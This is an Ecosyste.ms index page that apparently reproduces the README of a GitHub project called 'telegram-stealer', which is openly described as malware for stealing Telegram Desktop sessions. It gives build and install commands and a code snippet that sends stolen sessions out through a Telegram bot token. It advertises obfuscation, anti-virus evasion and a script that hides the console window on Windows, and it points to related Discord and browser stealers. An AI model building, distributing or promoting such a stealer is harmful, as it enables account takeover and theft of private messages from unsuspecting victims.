Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/rigwild/telegram-stealer
Steal Telegram Desktop sessions
https://github.com/rigwild/telegram-stealer
malware stealer telegram telegram-session telegram-session-stealer telegram-stealer telegram-webhook webhook
Last synced: about 2 months ago
JSON representation
Steal Telegram Desktop sessions
- Host: GitHub
- URL: https://github.com/rigwild/telegram-stealer
- Owner: rigwild
- License: mit
- Created: 2022-07-14T20:07:28.000Z (over 2 years ago)
- Default Branch: main
- Last Pushed: 2022-08-07T17:36:51.000Z (over 2 years ago)
- Last Synced: 2024-10-16T19:24:13.940Z (2 months ago)
- Topics: malware, stealer, telegram, telegram-session, telegram-session-stealer, telegram-stealer, telegram-webhook, webhook
- Language: JavaScript
- Homepage:
- Size: 44.9 KB
- Stars: 16
- Watchers: 2
- Forks: 5
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
# Telegram Stealer
Steal Telegram Desktop sessions.
**Check [Waifu Stealer](https://github.com/rigwild/waifu-stealer) (Stealer builder: Discord, Telegram, Browsers, ...)**
If the stealer is started inside WSL, it will get the Telegram Desktop sessions from its Windows host.
**Note:** If the target configured a local password in Telegram Desktop, the sessions will be encrypted, so you would need the password to unlock it.
## Demo
https://youtu.be/3mKOwtCnwYw
## Features
- Steal Telegram Desktop sessions
- Works on all platforms, including WSL (on WSL, the binary will get the sessions from its Windows host)
- If Telegram Desktop is not in appData (i.e. portable installation), inspect the `Telegram.exe` running process to find its path (Windows or WSL only)
- Source is highly obfuscated using [javascript-obfuscator](https://github.com/javascript-obfuscator/javascript-obfuscator) and encrypted with `AES-256-GCM`
- Output binary is packaged to a single portable binary using [pkg](https://github.com/vercel/pkg)
- Send sessions via Telegram using webhooks
- Try to detect some anti-virus virtual machines to be FUD as long as possible## Build
Install dependencies
```sh
npm i -D
npm i -g pkg
```Build
```sh
npm run build# Create the stealer binary, choose target system and architecture
npm run pkg-windows
npm run pkg-linux
npm run pkg-linux-arm
npm run pkg-macos
npm run pkg-macos-arm
```## Run
Run the `hello` binary.
To hide the console window on a Windows machine, you can run the script using the provided VB script (see [`run_hidden_windows.vbs`](./run_hidden_windows.vbs)).
## Include in your project
```sh
npm install https://github.com/rigwild/telegram-stealer.git
``````ts
import { run as stealTelegram } from 'telegram-stealer'type StealTelegram = ({
telegramChatId: string,
telegramToken: string,
archivePassword?: string
}) => Promiseawait stealTelegram({
telegramChatId: '1234567890',
telegramToken: '12345678:EEExreg_CKLviTXNwTTfc-UdcStDOPfqFoMQ',
archivePassword: 'rigwild/telegram-stealer'
})
```## Related projects
- [Waifu Stealer](https://github.com/rigwild/waifu-stealer) - Stealer builder (Browsers, Discord, Telegram, ...)
- [Discord Stealer](https://github.com/rigwild/discord-stealer) - Steal Discord tokens from clients and browsers## License
[The MIT license](./LICENSE)